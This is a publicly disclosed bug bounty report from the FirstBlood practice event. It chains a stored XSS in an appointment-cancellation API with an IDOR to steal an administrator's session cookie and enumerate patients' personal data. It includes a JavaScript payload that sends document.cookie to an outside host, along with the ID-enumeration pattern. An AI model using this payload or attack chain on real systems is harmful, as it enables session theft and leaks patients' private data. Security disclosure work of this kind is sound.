FirstBlood-#83 — Leaking PII data of users who have appointments using stored XSS and IDOR
This report has been reviewed and accepted as a valid vulnerability on FirstBlood!
On 2021-05-10, xnl-h4ck3r reported:
A stored XSS vulnerability exists in the manage appointments api
/api/ma.php. An attacker can make an appointment, and then subsequently cancel it, but add the
message parameter with an XSS payload that will fire on the admin cancellation page
/drpanel/cancelled.php. This can leak the admins
drps cookie value.
This cookie can then be used to make an authorised GET request to
aptid parameter in the query string. An IDOR exists on this parameter that allows an attacker to enumerate the ID and therefore leak personal information for each user that has an appointment.
/drpanel/drapi/query.php the value of
aptid takes the format
5691??19 where ?? is an even number starting at 02, 04, 06, etc. for each appointment booked.
This endpoint will then reveal the Name, Address, Telephone and DOB of the user.
User data of ALL patients can also be leaked using the leaked cookie value in a POST request to
/drpanel/drapi/qp.php and post parameter of
Steps to Reproduce
- Book an appointment on
/book-appointment.html and make a note of the Appointment ID that is given, e.g.
- Go to
/yourappointments.php, enter your Appointment ID and click Retrieve Appointment
- Run traffic through Burp proxy
- Click CANCEL APPOINTMENT button.
- Go to the last POST to
/api/ma.php in Burp history and send to Repeater.
- NOTE: ALTHOUGH THE APPOINTMENT HAS BEEN CANCELLED, YOU CAN STILL USE THE APPOINTMEMT ID IN THE API
- Now add the following post parameter
This is a Base64 encoding of
var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();
- Send the Request
- Now log in as an administrator and visit endpoint
- Observe the XSS payload firing and sending the value of the admins cookie to my server:
- Make a GET request to
???? is enumerated by adding 137 to the previous value each time.
- Observe the user data returned for each appointment:
- Make a POST request to
/drpanel/drapi/qp.ph using the admins cookie, and providing a post parameter of
- Observe the response containing PII data of ALL patients:
The impact of this vulnerability is that an attacker could steal the admins
drps cookie, then enumerate the aptid to then leak the personal data of users with appointments, or make a query to see ALL patients PII.
This report has been publicly disclosed for everyone to view
FirstBlood ID: 8
Vulnerability Type: Stored XSS
When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors
Respect Earnt: 2000000
is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.